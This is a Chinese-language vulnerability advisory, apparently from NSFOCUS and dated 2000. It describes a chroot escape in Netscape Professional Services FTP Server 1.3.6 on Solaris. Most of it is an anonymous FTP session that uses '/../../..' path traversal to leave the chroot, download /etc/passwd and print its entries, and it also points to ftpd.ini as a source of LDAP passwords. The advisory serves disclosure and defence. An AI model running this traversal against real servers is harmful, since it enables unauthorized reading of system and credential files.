安全研究
安全漏洞
Netscape Professional Services FTP Server chroot漏洞
发布日期:2000-06-22
更新日期:2000-06-22
受影响系统:
描述:
Netscape Netscape Professional Services FTP Server 1.3.6
- Sun Solaris 7.0
- Sun Solaris 2.6
Netscape Professional Services FTP server经常被用在一些为用户提供虚拟主机服务的
高性能服务器上。它也可以使用LDAP进行认证,常常安装在Sun系统上。但它的chroot模式的
代码中存在一些安全问题,可能导致远程用户威胁LDAP服务器和操作系统的安全。
- 匿名用户或者受限(chrooted)用户可以任意下载任意系统文件,例如/etc/passwd文件,也
可以以ftpd daemon的权限上传文件
- 如果ftp server使用LDAP用户认证,不同的LDAP账号使用同一个系统账号。因此任何用户都
可以访问或者覆盖其他用户的文件。
- 通过访问/../../../../../../../../opt/netscape/ftpd/conf/ftpd.ini等文件,可以
得到LDAP口令
<* 来源:Michal Zalewski [lcamtuf@tpi.pl] *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ ftp ftp.XXXX.xxx
Connected to ftp.XXXX.xxx.
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services
220 You will be logged off after 1200 seconds of inactivity.
Name (ftp.XXXX.xxx:lcamtuf): anonymous
331 Anonymous user OK, send e-mail address as password.
Password:
230 Logged in OK
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such
file or directory
[Well... this won't work... uh, lovely physical path, btw ;]
ftp> cd /../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or
directory
ftp> cd /../../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/dupa" because
No such file or directory
[Erm? Good God!]
ftp> cd /../../../../../../../../etc/dupa
550 Can't change directory to "/etc/dupa" because No such file or
directory
ftp> cd /../../../../../../../../etc/
250 CWD command successful.
ftp> get /../../../../../../../../etc/passwd KUKU
local: KUKU remote: /../../../../../../../../etc/passwd
200 PORT successfull, connected to A.B.C.D port 62437
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.
150 Opening data connection
226 File downloaded successfully (602 bytes, 602 bytes xmitted)
602 bytes received in 1.71 secs (0.34 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 CPU time spent on you: 0.100 seconds.
$ cat KUKU
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
...
建议:
暂无
浏览次数:6641
严重程度:0(网友投票)
绿盟科技给您安全的保障